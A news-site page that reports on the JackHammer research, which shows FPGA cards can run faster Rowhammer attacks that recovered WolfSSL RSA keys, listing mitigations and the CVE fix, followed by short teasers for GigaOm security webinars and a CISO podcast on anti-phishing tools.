Connect with us


FPGA cards can be abused for faster and more reliable Rowhammer attacks



Image: ZDNet, Priyanka from the Noun Project

In a new research paper published on the last day of 2019, a team of American and German academics has shown that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks.

The new research expands on previous work into an attack vector known as Rowhammer.

A short history of Rowhammer attacks

Rowhammer attacks were first detailed in 2014. The attack exploits a design flaw in the hardware modern memory cards — most commonly known as RAM.

On modern RAM cards, data is stored inside memory cells, and all memory cells are arranged in a grid pattern. In 2014, academics discovered that by reading data stored on one row of memory cells repeatedly, and at high speeds, they could create an electrical charge that would alter data stored in nearby memory rows.

By coordinating repeated read operations, in an operation named “row hammering,” they could use the unwanted electrical charges to corrupt RAM data, or manipulate the user’s data in malicious ways.

After it was disclosed to the public, industry experts deemed the Rowhammer attack only a theoretical threat, but one that had the potential to become a bigger problem later down the line.

Experts believed that while the initial Rowhammer attack looked inefficient at altering or corrupting data, academics would eventually find new ways to launch Rowhammer attacks and improve the damage the attack could cause.

RAM vendors reacted by modifying RAM card designs and by introducing software mitigations to deal with the potential damage that could come from a future, potential, Rowhammer attack.

Just as it was initially predicted, over the past five years, academics have greatly expanded on the initial Rowhammer attack. They found ways around mitigations, they expanded the attack surface to various computer components and configurations, and they even found a way to use Rowhammer to steal data from attacked systems, insted of just altering it. Below is a summary of all the work done with Rowhammer attacks.

New JackHammer attack

The latest addition to this list is a new Rowhammer attack variation called JackHammer, which allows a malicious party to abuse FPGA cards to launch better and faster Rowhammer attacks.

For those unfamiliar with the term, FPGAs are add-in cards that can be added to a computer system (desktop or server). They are computer components designed to optimize performance by allowing the user to customize it based on their needs, and are sometimes referred to as “accelerators.”

FPGAs are often used with systems designed to run very specific tasks, such as cryptocurrency mining, web servers, heavy computation systems, and so on.

In recent years, FPGAs have made their way into cloud computing environments where they’re now a common offering. Companies like Alibaba Cloud and Amazon Web Services (AWS) provide customers FPGA-based server instances so customers can optimize performance for specific tasks. Microsoft is also working on integrating FPGA-based technology inside Azure.

Seeing that FPGA-CPU architectures are becoming more common, a team of researchers from the Worcester Polytechnic Institute in the US, the University of Lubeck in Germany, and Intel, have looked into how Rowhammer attacks impact this new cloud setup.

They found that when the attack code is launched from within a user-configured FPGA, Rowhammer attacks are more efficient at causing bit flips and do it at a faster speed than if the attack was launched using malicious code executed inside the CPU — as is how all other Rowhammer attacks work.

This is because FPGA cards connect directly to a processor’s bus, giving the FPGA direct and untethered access to the CPU cache and RAM memory. Further, FPGA’s don’t have to deal with firmware and OS software, allowing it to run code faster than a normal CPU.

Twice as fast, four times more bit flips

“In a Rowhammer attack, a significant factor in the speed and efficacy of an attack is the rate at which memory can be repeatedly accessed,” the research team explains.

“On many systems, the CPU is sufficiently fast to cause some bit flips, but the FPGA can repeatedly access its host machine’s memory system substantially faster than the host machine’s CPU can.”

In a proof-of-concept experiment detailed in their paper, the research team launched a classic CPU-based Rowhammer attack and a new FPGA-based JackHammer attack against the WolfCrypt RSA implementation, part of theWolfSSL Library, recovering private keys used to secure SSL connections.

“Our results indicate that a malicious FPGA can perform twice as fast as a typical Rowhammer attack from the CPU on the same system and causes around four times as many bit flips as the CPU attack,” the research team said.


Image: Weissman et al.

Furthermore, the academic team also found that a JackHammer attack is much more difficult to detect because of the FPGA’s direct access to system resources leaves no traces on the CPU of the FPGA’s memory access operations. Since most anti-Rowhammer detection systems are configured at the CPU level, this opens a new blindspot in CPU and cloud security.

For their tests, academics used an Intel Arria 10 GX FPGA; however, this doesn’t mean Arria FPGAs are vulnerable.

By design, FPGAs are meant to “accelerate” systems. The actual problem behind JackHammer is the inherent trust put in user-configurable FPGAs used in cloud environments, and the lack of security controls and protections designed for FPGA-run code.

“From a security perspective, a user-configurable FPGA on a cloud system needs to be treated with at least as much care and caution as a user-controlled CPU thread, as it can exploit many of the same vulnerabilities,” researchers said.

Through their work, the research team would like to see cloud vendors react and add appropriate protections against malicious code executed within FPGAs instead of CPUs.

The research team listed several mitigations that cloud vendors could deploy to secure cloud computing platforms against JackHammer. They include the use of hardware monitoring, partitioning CPU cache, CPU cache pinning, increased refresh rates for DRAM memory, and more.

For more details on this new FPGA attack vector, please see the research team’s white paper, titled “JackHammer: Efficient Rowhammer on Heterogeneous FPGA-CPU Platforms.”

WolfSSL 4.3.0, released on December 20, contains a fix (CVE-2019-19962) to prevent and mitigate JackHammer attacks.

Source link

Continue Reading


The Five Pillars of (Azure) Cloud-based Application Security



This 1-hour webinar from GigaOm brings together experts in Azure cloud application migration and security, featuring GigaOm analyst Jon Collins and special guests from Fortinet, Director of Product Marketing for Public Cloud, Daniel Schrader, and Global Director of Public Cloud Architecture and Engineering, Aidan Walden.

These interesting times have accelerated the drive towards digital transformation, application rationalization, and migration to cloud-based architectures. Enterprise organizations are looking to increase efficiency, but without impacting performance or increasing risk, either from infrastructure resilience or end-user behaviors.

Success requires a combination of best practice and appropriate use of technology, depending on where the organization is on its cloud journey. Elements such as zero-trust access and security-driven networking need to be deployed in parallel with security-first operations, breach prevention and response.

If you are looking to migrate applications to the cloud and want to be sure your approach maximizes delivery whilst minimizing risk, this webinar is for you.

Continue Reading


Data Management and Secure Data Storage for the Enterprise



This free 1-hour webinar from GigaOm Research brings together experts in data management and security, featuring GigaOm Analyst Enrico Signoretti and special guest from RackTop Systems, Jonathan Halstuch. The discussion will focus on data storage and how to protect data against cyberattacks.

Most of the recent news coverage and analysis of cyberattacks focus on hackers getting access and control of critical systems. Yet rarely is it mentioned that the most valuable asset for the organizations under attack is the data contained in these systems.

In this webinar, you will learn about the risks and costs of a poor data security management approach, and how to improve your data storage to prevent and mitigate the consequences of a compromised infrastructure.

Continue Reading


CISO Podcast: Talking Anti-Phishing Solutions



Simon Gibson earlier this year published the report, “GigaOm Radar for Phishing Prevention and Detection,” which assessed more than a dozen security solutions focused on detecting and mitigating email-borne threats and vulnerabilities. As Gibson noted in his report, email remains a prime vector for attack, reflecting the strategic role it plays in corporate communications.

Earlier this week, Gibson’s report was a featured topic of discussions on David Spark’s popular CISO Security Vendor Relationship Podcast. In it, Spark interviewed a pair of chief information security officers—Mike Johnson, CISO for SalesForce, and James Dolph, CISO for Guidewire Software—to get their take on the role of anti-phishing solutions.

“I want to first give GigaOm some credit here for really pointing out the need to decide what to do with detections,” Johnson said when asked for his thoughts about selecting an anti-phishing tool. “I think a lot of companies charge into a solution for anti-phishing without thinking about what they are going to do when the thing triggers.”

As Johnson noted, the needs and vulnerabilities of a large organization aligned on Microsoft 365 are very different from those of a smaller outfit working with GSuite. A malicious Excel macro-laden file, for example, poses a credible threat to a Microsoft shop and therefore argues for a detonation solution to detect and neutralize malicious payloads before they can spread and morph. On the other hand, a smaller company is more exposed to business email compromise (BEC) attacks, since spending authority is often spread among many employees in these businesses.

Gibson’s radar report describes both in-line and out-of-band solutions, but Johnson said cloud-aligned infrastructures argue against traditional in-line schemes.

“If you put an in-line solution in front of [Microsoft] 365 or in front of GSuite, you are likely decreasing your reliability, because you’ve now introduced this single point of failure. Google and Microsoft have this massive amount of reliability that is built in,” Johnson said.

So how should IT decision makers go about selecting an anti-phishing solution? Dolph answered that question with a series of questions of his own:

“Does it nail the basics? Does it fit with the technologies we have in place? And then secondarily, is it reliable, is it tunable, is it manageable?” he asked. “Because it can add a lot overhead, especially if you have a small team if these tools are really disruptive to the email flow.”

Dolph concluded by noting that it’s important for solutions to provide insight that can help organizations target their protections, as well as support both training and awareness around threats. Finally, he urged organizations to consider how they can measure the effectiveness of solutions.

“I may look at other solutions in the future and how do I compare those solutions to the benchmark of what we have in place?”

Listen to the Podcast: CISO Podcast

Continue Reading